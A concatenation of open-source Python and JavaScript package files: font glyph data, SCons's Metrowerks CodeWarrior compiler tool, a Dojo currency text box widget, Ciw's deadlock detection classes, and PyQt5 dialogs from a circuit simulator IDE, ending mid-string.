N":-27,"M":193,"L":171,"K":-46,"J":69,"I":44,"H":113,"G":42,"F":110,"E":143,"D":123,"C":75,"B":-71,"A":270,"@":130,"?":240,";":417,":":343,"9":32,"8":-25,"7":223,"6":112,"5":111,"4":102,"3":380,"2":210,"1":164,"\/":430,".":350,"-":242,",":419,")":177,"(":81,"&":229,"%":369,"$":102,"#":252,"!":118}},"\u00a3":{},"\u00a7":{},"\u00b6":{},"\u00df":{},"\u00ae":{},"\u00a9":{},"\u00b4":{},"\u00a8":{},"\u00c6":{},"\u00d8":{},"\u00b1":{},"\u00a5":{},"\u00b5":{},"\u00aa":{},"\u00ba":{},"\u00e6":{},"\u00f8":{"w":554},"\u00bf":{"d":"367,-347v0,-22,49,-50,70,-50v41,0,61,15,61,46v0,37,-21,56,-64,56v-45,0,-67,-17,-67,-52xm410,-131v63,0,112,58,111,118v0,55,-46,128,-148,207r-275,212v-99,81,-148,145,-148,194v0,89,68,134,204,134v72,0,154,-22,246,-67v61,-30,130,-72,207,-125v64,-45,98,-67,101,-67v29,0,44,16,44,49v0,34,-56,83,-169,147v-95,55,-167,89,-215,102v-73,20,-145,30,-217,30v-185,0,-278,-69,-278,-207v0,-71,44,-158,149,-237r276,-207v99,-74,149,-132,149,-173v0,-22,-10,-34,-31,-37v-36,-5,-54,-16,-54,-33v0,-27,16,-40,48,-40","w":741},"\u00a1":{"d":"197,-357v0,-22,49,-50,70,-50v41,0,61,15,61,46v0,37,-21,56,-64,56v-45,0,-67,-17,-67,-52xm267,758v11,31,-23,60,-49,61v-37,0,-70,-84,-98,-253v-28,-173,-44,-319,-35,-482v5,-93,76,-234,146,-259v19,-7,45,-13,48,8v1,10,-2,22,-15,32v-57,43,-87,135,-87,282v0,243,33,446,90,611","w":418},"\u00ac":{"d":"185,-351v-37,155,-51,236,-31,373v5,27,23,53,55,78v23,17,14,43,-13,52v-17,7,-33,4,-48,-7v-51,-38,-76,-116,-76,-233v0,-206,52,-323,96,-553v4,-22,18,-33,43,-33v31,0,44,13,39,40v-6,36,-29,130,-65,283","w":372},"\u00ab":{},"\u00bb":{},"\u00a0":{},"\u00c0":{"k":{"\u00d0":77,"\u00c2":164,"\u00c0":-160,"\u00a2":310,"\u00d1":34,"\u00c9":99,"~":503,"z":66,"y":-200,"x":74,"w":78,"v":166,"u":63,"t":143,"s":98,"r":81,"q":76,"p":-77,"o":85,"n":51,"l":116,"k":84,"j":-502,"i":116,"h":75,"g":-94,"f":88,"e":61,"d":60,"c":75,"b":64,"a":52,"`":399,"Z":36,"Y":-90,"X":27,"W":366,"V":485,"U":123,"T":461,"S":181,"R":261,"Q":66,"P":222,"O":60,"N":292,"M":284,"L":74,"K":38,"J":-276,"I":123,"H":60,"G":84,"F":74,"E":146,"D":210,"C":52,"B":70,"A":67,"@":176,"?":334,";":260,":":230,"9":140,"8":165,"7":135,"6":85,"5":95,"4":143,"3":29,"2":21,"1":123,"0":68,"\/":70,".":172,"-":94,",":185,")":210,"(":125,"&":187,"%":70,"$":221,"#":332,"!":213}},"\u00c3":{},"\u00d5":{},"\u00f7":{},"\u00ff":{},"\u00a4":{},"\u00c2":{"k":{"\u00c1":89,"\u00c2":96,"\u00c0":246,"\u00a2":-83,"\u00d1":-26,"\u00c9":101,"~":366,"y":92,"x":-22,"v":-65,"t":23,"r":-48,"o":36,"n":-26,"m":-74,"l":-25,"k":-42,"j":-122,"g":51,"c":27,"b":-33,"`":350,"Z":-30,"Y":222,"X":-51,"W":-101,"V":243,"U":43,"T":228,"S":-51,"R":190,"Q":-47,"P":193,"O":-51,"N":209,"M":198,"L":-56,"K":-100,"J":-42,"H":-80,"G":-48,"F":-26,"E":201,"D":182,"C":-39,"B":157,"A":-54,"@":38,"?":276,";":99,":":176,"8":-81,"7":43,"5":-25,"2":-57,"1":-31,"0":-59,"\/":-50,".":173,"-":22,",":77,")":60,"&":120,"%":-50,"#":58,"!":68}},"\u00ca":{},"\u00c1":{"k":{"\u00d0":-78,"\u00c1":125,"\u00c2":37,"\u00c0":-45,"\u00a2":264,"\u00d1":-122,"\u00c9":79,"~":402,"y":-107,"w":-67,"u":-58,"t":-29,"s":-72,"r":-58,"q":-21,"p":-43,"o":-45,"n":-59,"m":-129,"l":-51,"k":-82,"j":-366,"i":-49,"h":-63,"f":-80,"e":-56,"c":-47,"b":-91,"a":-27,"`":385,"Y":46,"X":-31,"W":221,"V":281,"U":25,"T":263,"S":88,"R":222,"Q":-100,"P":227,"O":-107,"N":239,"M":233,"K":-130,"J":-285,"I":69,"H":-46,"G":-79,"F":-91,"E":-22,"D":42,"C":-110,"A":-68,"?":306,";":163,":":178,"9":-25,"8":241,"7":56,"6":-65,"5":-47,"3":-42,"2":-20,"1":36,"0":-98,".":152,"-":-61,",":150,")":111,"(":-40,"&":51,"$":29,"#":342,"!":44}},"\u00cb":{},"\u00c8":{},"\u00cd":{},"\u00ce":{},"\u00cf":{},"\u00cc":{},"\u00d3":{},"\u00d4":{},"\u00d2":{},"\u00da":{},"\u00db":{},"\u00d9":{},"\u00af":{},"\u00b8":{},"\u00a6":{},"\u00d0":{"k":{"\u00d0":-103,"\u00c1":107,"\u00c0":284,"\u00a2":-104,"\u00d1":-147,"\u00c9":838,"~":577,"z":255,"y":-74,"x":61,"w":-103,"v":-97,"u":-83,"t":-109,"s":-138,"r":-102,"p":-81,"o":-64,"n":-87,"m":-167,"l":-101,"k":-135,"j":60,"i":-92,"h":-100,"f":-67,"e":-49,"d":47,"c":-52,"b":-135,"a":46,"`":474,"Z":151,"Y":36,"X":54,"W":184,"V":251,"T":243,"S":-71,"R":62,"Q":-157,"O":-157,"N":121,"M":112,"L":63,"K":-179,"J":366,"I":112,"H":-97,"G":-155,"F":-135,"E":-94,"C":-149,"B":-41,"A":50,"@":-72,"?":144,";":192,":":85,"9":-122,"8":85,"7":89,"6":-101,"5":-165,"4":-110,"3":97,"2":269,"0":-155,"\/":148,".":279,"-":-79,",":348,")":214,"(":-92,"&":66,"%":148,"$":-107}},"\u00f0":{},"\u00dd":{},"\u00fd":{},"\u00de":{},"\u00fe":{},"\u00ad":{},"\u00d7":{},"\u00b9":{},"\u00b2":{},"\u00b3":{},"\u00bd":{},"\u00bc":{},"\u00be":{}}}); | PypiClean |
/Nuitka-1.8.tar.gz/Nuitka-1.8/nuitka/build/inline_copy/lib/scons-2.3.2/SCons/Tool/mwcc.py |
__revision__ = "src/engine/SCons/Tool/mwcc.py 2014/07/05 09:42:21 garyo"
import os
import os.path
import SCons.Util
def set_vars(env):
"""Set MWCW_VERSION, MWCW_VERSIONS, and some codewarrior environment vars
MWCW_VERSIONS is set to a list of objects representing installed versions
MWCW_VERSION is set to the version object that will be used for building.
MWCW_VERSION can be set to a string during Environment
construction to influence which version is chosen, otherwise
the latest one from MWCW_VERSIONS is used.
Returns true if at least one version is found, false otherwise
"""
desired = env.get('MWCW_VERSION', '')
# return right away if the variables are already set
if isinstance(desired, MWVersion):
return 1
elif desired is None:
return 0
versions = find_versions()
version = None
if desired:
for v in versions:
if str(v) == desired:
version = v
elif versions:
version = versions[-1]
env['MWCW_VERSIONS'] = versions
env['MWCW_VERSION'] = version
if version is None:
return 0
env.PrependENVPath('PATH', version.clpath)
env.PrependENVPath('PATH', version.dllpath)
ENV = env['ENV']
ENV['CWFolder'] = version.path
ENV['LM_LICENSE_FILE'] = version.license
plus = lambda x: '+%s' % x
ENV['MWCIncludes'] = os.pathsep.join(map(plus, version.includes))
ENV['MWLibraries'] = os.pathsep.join(map(plus, version.libs))
return 1
def find_versions():
"""Return a list of MWVersion objects representing installed versions"""
versions = []
### This function finds CodeWarrior by reading from the registry on
### Windows. Some other method needs to be implemented for other
### platforms, maybe something that calls env.WhereIs('mwcc')
if SCons.Util.can_read_reg:
try:
HLM = SCons.Util.HKEY_LOCAL_MACHINE
product = 'SOFTWARE\\Metrowerks\\CodeWarrior\\Product Versions'
product_key = SCons.Util.RegOpenKeyEx(HLM, product)
i = 0
while True:
name = product + '\\' + SCons.Util.RegEnumKey(product_key, i)
name_key = SCons.Util.RegOpenKeyEx(HLM, name)
try:
version = SCons.Util.RegQueryValueEx(name_key, 'VERSION')
path = SCons.Util.RegQueryValueEx(name_key, 'PATH')
mwv = MWVersion(version[0], path[0], 'Win32-X86')
versions.append(mwv)
except SCons.Util.RegError:
pass
i = i + 1
except SCons.Util.RegError:
pass
return versions
class MWVersion(object):
def __init__(self, version, path, platform):
self.version = version
self.path = path
self.platform = platform
self.clpath = os.path.join(path, 'Other Metrowerks Tools',
'Command Line Tools')
self.dllpath = os.path.join(path, 'Bin')
# The Metrowerks tools don't store any configuration data so they
# are totally dumb when it comes to locating standard headers,
# libraries, and other files, expecting all the information
# to be handed to them in environment variables. The members set
# below control what information scons injects into the environment
### The paths below give a normal build environment in CodeWarrior for
### Windows, other versions of CodeWarrior might need different paths.
msl = os.path.join(path, 'MSL')
support = os.path.join(path, '%s Support' % platform)
self.license = os.path.join(path, 'license.dat')
self.includes = [msl, support]
self.libs = [msl, support]
def __str__(self):
return self.version
CSuffixes = ['.c', '.C']
CXXSuffixes = ['.cc', '.cpp', '.cxx', '.c++', '.C++']
def generate(env):
"""Add Builders and construction variables for the mwcc to an Environment."""
import SCons.Defaults
import SCons.Tool
set_vars(env)
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in CSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCAction)
for suffix in CXXSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CXXAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCXXAction)
env['CCCOMFLAGS'] = '$CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS -nolink -o $TARGET $SOURCES'
env['CC'] = 'mwcc'
env['CCCOM'] = '$CC $CFLAGS $CCFLAGS $CCCOMFLAGS'
env['CXX'] = 'mwcc'
env['CXXCOM'] = '$CXX $CXXFLAGS $CCCOMFLAGS'
env['SHCC'] = '$CC'
env['SHCCFLAGS'] = '$CCFLAGS'
env['SHCFLAGS'] = '$CFLAGS'
env['SHCCCOM'] = '$SHCC $SHCFLAGS $SHCCFLAGS $CCCOMFLAGS'
env['SHCXX'] = '$CXX'
env['SHCXXFLAGS'] = '$CXXFLAGS'
env['SHCXXCOM'] = '$SHCXX $SHCXXFLAGS $CCCOMFLAGS'
env['CFILESUFFIX'] = '.c'
env['CXXFILESUFFIX'] = '.cpp'
env['CPPDEFPREFIX'] = '-D'
env['CPPDEFSUFFIX'] = ''
env['INCPREFIX'] = '-I'
env['INCSUFFIX'] = ''
#env['PCH'] = ?
#env['PCHSTOP'] = ?
def exists(env):
return set_vars(env)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | PypiClean |
/FreePyBX-1.0-RC1.tar.gz/FreePyBX-1.0-RC1/freepybx/public/js/dijit/form/CurrencyTextBox.js.uncompressed.js | define("dijit/form/CurrencyTextBox", [
"dojo/currency", // currency._mixInDefaults currency.format currency.parse currency.regexp
"dojo/_base/declare", // declare
"dojo/_base/lang", // lang.hitch
"./NumberTextBox"
], function(currency, declare, lang, NumberTextBox){
/*=====
var NumberTextBox = dijit.form.NumberTextBox;
=====*/
// module:
// dijit/form/CurrencyTextBox
// summary:
// A validating currency textbox
/*=====
declare(
"dijit.form.CurrencyTextBox.__Constraints",
[dijit.form.NumberTextBox.__Constraints, currency.__FormatOptions, currency.__ParseOptions], {
// summary:
// Specifies both the rules on valid/invalid values (minimum, maximum,
// number of required decimal places), and also formatting options for
// displaying the value when the field is not focused (currency symbol,
// etc.)
// description:
// Follows the pattern of `dijit.form.NumberTextBox.constraints`.
// In general developers won't need to set this parameter
// example:
// To ensure that the user types in the cents (for example, 1.00 instead of just 1):
// | {fractional:true}
});
=====*/
return declare("dijit.form.CurrencyTextBox", NumberTextBox, {
// summary:
// A validating currency textbox
// description:
// CurrencyTextBox is similar to `dijit.form.NumberTextBox` but has a few
// extra features related to currency:
//
// 1. After specifying the currency type (american dollars, euros, etc.) it automatically
// sets parse/format options such as how many decimal places to show.
// 2. The currency mark (dollar sign, euro mark, etc.) is displayed when the field is blurred
// but erased during editing, so that the user can just enter a plain number.
// currency: [const] String
// the [ISO4217](http://en.wikipedia.org/wiki/ISO_4217) currency code, a three letter sequence like "USD"
currency: "",
/*=====
// constraints: dijit.form.CurrencyTextBox.__Constraints
// Despite the name, this parameter specifies both constraints on the input
// (including minimum/maximum allowed values) as well as
// formatting options. See `dijit.form.CurrencyTextBox.__Constraints` for details.
constraints: {},
======*/
baseClass: "dijitTextBox dijitCurrencyTextBox",
// Override regExpGen ValidationTextBox.regExpGen().... we use a reg-ex generating function rather
// than a straight regexp to deal with locale (plus formatting options too?)
regExpGen: function(constraints){
// if focused, accept either currency data or NumberTextBox format
return '(' + (this.focused ? this.inherited(arguments, [ lang.mixin({}, constraints, this.editOptions) ]) + '|' : '')
+ currency.regexp(constraints) + ')';
},
// Override NumberTextBox._formatter to deal with currencies, ex: converts "123.45" to "$123.45"
_formatter: currency.format,
_parser: currency.parse,
parse: function(/*String*/ value, /*Object*/ constraints){
// summary:
// Parses string value as a Currency, according to the constraints object
// tags:
// protected extension
var v = this.inherited(arguments);
if(isNaN(v) && /\d+/.test(value)){ // currency parse failed, but it could be because they are using NumberTextBox format so try its parse
v = lang.hitch(lang.mixin({}, this, { _parser: NumberTextBox.prototype._parser }), "inherited")(arguments);
}
return v;
},
_setConstraintsAttr: function(/*Object*/ constraints){
if(!constraints.currency && this.currency){
constraints.currency = this.currency;
}
this.inherited(arguments, [ currency._mixInDefaults(lang.mixin(constraints, { exponent: false })) ]); // get places
}
});
}); | PypiClean |
/Ciw-3.0.0.tar.gz/Ciw-3.0.0/ciw/deadlock/deadlock_detector.py | import networkx as nx
class NoDetection(object):
"""
A generic class for all deadlock detector classes to inherit from.
Using this class is equivalent to having no deadlock detection
capabilities.
"""
def __init__(self):
"""
Initialises the detection mechanism class.
"""
pass
def initialise_at_node(self, node):
"""
Initialises the detection mechanism when the node is created.
"""
pass
def detect_deadlock(self):
"""
Returns True is deadlock is reached, False otherwise.
"""
return False
def action_at_attach_server(self, node, server, individual):
"""
The action taken at the 'attach_server' method of the node.
"""
pass
def action_at_blockage(self, individual, next_node):
"""
The action takn at the 'block_individual' method of the node.
"""
pass
def action_at_detatch_server(self, server):
"""
The action taken at the 'detatch_server' method of the node.
"""
pass
class StateDigraph(NoDetection):
"""
The state digraph method keeps track of a directed graph of the
simulation state, where:
- Vertices represent Servers
- Edges represent blockage relationships, such that there
is a directed edge from vertices j -> k iff the customer
at server j is blocked from entering the node that
contains k.
Deadlock is equivalent to a knot in the directed graph.
"""
def __init__(self):
"""
Initialises the state digraph detection mechanism class.
"""
self.statedigraph = nx.DiGraph()
def initialise_at_node(self, node):
"""
Initialises the state digraph when the node is created.
Adds the servers of that node if c < Inf.
"""
if node.c < float("Inf"):
self.statedigraph.add_nodes_from([str(s) for s in node.servers])
def detect_deadlock(self):
"""
Detects whether the system is in a deadlocked state,
that is, is there a knot. Note that this code is taken
and adapted from the NetworkX Developer Zone Ticket
#663 knot.py (09/06/2015).
"""
knots = []
for c in nx.strongly_connected_components(self.statedigraph):
subgraph = self.statedigraph.subgraph(c)
nodes = set(subgraph.nodes())
if len(nodes) == 1:
n = nodes.pop()
nodes.add(n)
if set(self.statedigraph.successors(n)) == nodes:
knots.append(subgraph)
else:
for n in nodes:
successors = nx.descendants(self.statedigraph, n)
if successors <= nodes:
knots.append(subgraph)
break
if len(knots) > 0:
return True
return False
def action_at_attach_server(self, node, server, individual):
"""
The action taken at the 'attach_server' method of the node:
- If new customer joins server, and they're server is still
blocking a customer, then that edge needs to remain.
However it was removed at the action_at_detatch_server, so
it needs to be added back in.
"""
for blq in node.blocked_queue:
inds = [
ind for ind in node.simulation.nodes[blq[0]].all_individuals
if ind.id_number == blq[1]
]
ind = inds[0]
if ind != individual:
self.statedigraph.add_edge(str(ind.server), str(server))
def action_at_blockage(self, individual, next_node):
"""
The action takn at the 'block_individual' method of the node:
- Add edges between blocked server and servers of the next node.
"""
for svr in next_node.servers:
self.statedigraph.add_edge(str(individual.server), str(svr))
def action_at_detatch_server(self, server):
"""
The action taken at the 'detatch_server' method of the node:
- Remove any edges of servers who have been detatched.
"""
self.statedigraph.remove_edges_from(
list(self.statedigraph.in_edges(str(server)))
+ list(self.statedigraph.out_edges(str(server)))
) | PypiClean |
/IDEPyAMS-0.0.4.3.tar.gz/IDEPyAMS-0.0.4.3/src/dialogs.py |
from PyQt5 import QtCore, QtGui, QtWidgets
from collections import deque
import os
import data_rc
#-------------------------------------------------------------------------------
# class Ui_DialogImportPart: intrface of dialog for import symbols.
#-------------------------------------------------------------------------------
class Ui_DialogImportPart(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(396, 389)
self.gridLayout = QtWidgets.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.treeView = QtWidgets.QTreeView(Dialog)
self.treeView.setObjectName("treeView")
self.verticalLayout.addWidget(self.treeView)
self.horizontalLayout.addLayout(self.verticalLayout)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.listView = QtWidgets.QListView(Dialog)
self.listView.setObjectName("listView")
self.verticalLayout_2.addWidget(self.listView)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "Directory"))
self.label_2.setText(_translate("Dialog", "Symbols"))
#-------------------------------------------------------------------------------
# class dialogImportPart: dialog for import symbols.
#-------------------------------------------------------------------------------
class dialogImportPart:
def __init__(self):
self.w = QtWidgets.QDialog()
self.pathLib='';
self.ui = Ui_DialogImportPart()
self.ui.setupUi(self.w)
self.dirModel = QtWidgets.QFileSystemModel()
self.dirModel.setRootPath(QtCore.QDir.rootPath())
self.dirModel.setFilter(QtCore.QDir.NoDotAndDotDot | QtCore.QDir.AllDirs)
self.fileModel = QtWidgets.QFileSystemModel()
self.fileModel.setNameFilters(["*.sym"])
self.fileModel.setNameFilterDisables(False)
self.ui.treeView.setModel(self.dirModel)
self.ui.listView.setModel(self.fileModel)
self.ui.treeView.clicked.connect(self.treeClicked)
self.ui.listView.clicked.connect(self.listClicked)
self.ui.treeView.hideColumn(1)
self.ui.treeView.hideColumn(2)
self.ui.treeView.hideColumn(3)
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
def setPath(self,path):
self.ui.treeView.setRootIndex(self.dirModel.index(path))
self.ui.listView.setRootIndex(self.fileModel.index(path))
def treeClicked(self, index):
path = self.dirModel.fileInfo(index).absoluteFilePath()
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
self.ui.listView.setRootIndex(self.fileModel.setRootPath(path))
def listClicked(self, index):
path = self.fileModel.fileInfo(index).absoluteFilePath()
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
if path!='':
root, ext = os.path.splitext(path)
if(ext=='.sym'):
self.file=path;
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(True);
def show(self):
self.w.show()
#-------------------------------------------------------------------------------
# class ui_option: interface of dialog about.
#-------------------------------------------------------------------------------
class ui_optionSimulation(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(387, 322)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/image/logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
Dialog.setSizeGripEnabled(False)
self.gridLayout_2 = QtWidgets.QGridLayout(Dialog)
self.gridLayout_2.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
self.gridLayout_2.setObjectName("gridLayout_2")
self.groupBox_2 = QtWidgets.QGroupBox(Dialog)
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_5 = QtWidgets.QLabel(self.groupBox_2)
self.label_5.setObjectName("label_5")
self.horizontalLayout_5.addWidget(self.label_5)
self.spinBoxInterval = QtWidgets.QSpinBox(self.groupBox_2)
self.spinBoxInterval.setMinimum(100)
self.spinBoxInterval.setMaximum(1100)
self.spinBoxInterval.setProperty("value", 100)
self.spinBoxInterval.setObjectName("spinBoxInterval")
self.horizontalLayout_5.addWidget(self.spinBoxInterval)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.gridLayout_2.addWidget(self.groupBox_2, 1, 0, 1, 1)
self.groupBox = QtWidgets.QGroupBox(Dialog)
self.groupBox.setObjectName("groupBox")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout_3.setObjectName("gridLayout_3")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.lineEditAbstol = QtWidgets.QLineEdit(self.groupBox)
self.lineEditAbstol.setObjectName("lineEditAbstol")
self.horizontalLayout.addWidget(self.lineEditAbstol)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_2 = QtWidgets.QLabel(self.groupBox)
self.label_2.setObjectName("label_2")
self.horizontalLayout_2.addWidget(self.label_2)
self.lineEditVnton = QtWidgets.QLineEdit(self.groupBox)
self.lineEditVnton.setObjectName("lineEditVnton")
self.horizontalLayout_2.addWidget(self.lineEditVnton)
self.gridLayout.addLayout(self.horizontalLayout_2, 1, 0, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label_3 = QtWidgets.QLabel(self.groupBox)
self.label_3.setObjectName("label_3")
self.horizontalLayout_3.addWidget(self.label_3)
self.lineEditReltol = QtWidgets.QLineEdit(self.groupBox)
self.lineEditReltol.setObjectName("lineEditReltol")
self.horizontalLayout_3.addWidget(self.lineEditReltol)
self.gridLayout.addLayout(self.horizontalLayout_3, 2, 0, 1, 1)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_4 = QtWidgets.QLabel(self.groupBox)
self.label_4.setObjectName("label_4")
self.horizontalLayout_4.addWidget(self.label_4)
self.spinBoxITL1 = QtWidgets.QSpinBox(self.groupBox)
self.spinBoxITL1.setMinimum(50)
self.spinBoxITL1.setMaximum(1000)
self.spinBoxITL1.setProperty("value", 100)
self.spinBoxITL1.setObjectName("spinBoxITL1")
self.horizontalLayout_4.addWidget(self.spinBoxITL1)
self.gridLayout.addLayout(self.horizontalLayout_4, 3, 0, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout, 0, 0, 1, 1)
self.gridLayout_2.addWidget(self.groupBox, 0, 0, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.pushButtonReset = QtWidgets.QPushButton(Dialog)
self.pushButtonReset.setObjectName("pushButtonReset")
self.horizontalLayout_6.addWidget(self.pushButtonReset)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.horizontalLayout_6.addWidget(self.buttonBox)
self.gridLayout_2.addLayout(self.horizontalLayout_6, 5, 0, 1, 1)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept) # type: ignore
self.buttonBox.rejected.connect(Dialog.reject) # type: ignore
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Simulator Options"))
self.groupBox_2.setTitle(_translate("Dialog", "Interactive simulation"))
self.label_5.setText(_translate("Dialog", "Interval of simulation in milliseconds "))
self.groupBox.setTitle(_translate("Dialog", "Converge"))
self.label.setText(_translate("Dialog", "Absolute flow tolerance (ABSTol) "))
self.lineEditAbstol.setText(_translate("Dialog", "1e-8"))
self.label_2.setText(_translate("Dialog", "Absolute potential tolerance (Vntol) "))
self.lineEditVnton.setText(_translate("Dialog", "1e-6"))
self.label_3.setText(_translate("Dialog", "Relative flow and potential tolerances (Realtol)"))
self.lineEditReltol.setText(_translate("Dialog", "1e-3"))
self.label_4.setText(_translate("Dialog", "Maximum number of iterations (ITL1) "))
self.pushButtonReset.setText(_translate("Dialog", "Reset to Default"))
#-------------------------------------------------------------------------------
# class option: about dialog.
#-------------------------------------------------------------------------------
class optionSimulation:
def __init__(self,result):
self.w = QtWidgets.QDialog()
self.r=result[0]
self.reset=False;
self.path='';
self.pathLib='';
self.ui = ui_optionSimulation()
self.ui.setupUi(self.w)
self.ui.spinBoxITL1.setValue(self.r['itl1']);
self.ui.spinBoxInterval.setValue(self.r['interval']);
self.ui.lineEditAbstol.setText(str(self.r['abstol']));
self.ui.lineEditReltol.setText(str(self.r['reltol']));
self.ui.lineEditVnton.setText(str(self.r['vntol']));
self.ui.buttonBox.accepted.connect(self.accept);
self.ui.pushButtonReset.clicked.connect(self.updateOption);
def accept(self):
try:
self.r['itl1']=self.ui.spinBoxITL1.value();
self.r['interval']=self.ui.spinBoxInterval.value();
self.r['abstol']=float(self.ui.lineEditAbstol.text());
self.r['reltol']=float(self.ui.lineEditReltol.text());
self.r['vntol']=float(self.ui.lineEditVnton.text());
except Exception as e: # work on python 3.x
str_error='Error: '+ str(e);
QtWidgets.QMessageBox.about(None, 'Error',str_error)
def updateOption(self):
self.reset=True;
self.w.close();
def show(self):
self.w.show()
#-------------------------------------------------------------------------------
# class ui_about: interface of dialog about.
#-------------------------------------------------------------------------------
class Ui_about(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.setEnabled(True)
Dialog.resize(499, 241)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/image/logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
Dialog.setSizeGripEnabled(False)
Dialog.setModal(False)
self.gridLayout = QtWidgets.QGridLayout(Dialog)
self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
self.gridLayout.setObjectName("gridLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setStyleSheet("")
self.label.setFrameShadow(QtWidgets.QFrame.Sunken)
self.label.setText("")
self.label.setTextFormat(QtCore.Qt.MarkdownText)
self.label.setPixmap(QtGui.QPixmap(":/image/logo.png"))
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setToolTip("")
self.label_2.setToolTipDuration(-1)
self.label_2.setAutoFillBackground(False)
self.label_2.setStyleSheet("")
self.label_2.setObjectName("label_2")
self.horizontalLayout.addWidget(self.label_2)
self.verticalLayout.addLayout(self.horizontalLayout)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label_2.setText(_translate("Dialog", '''
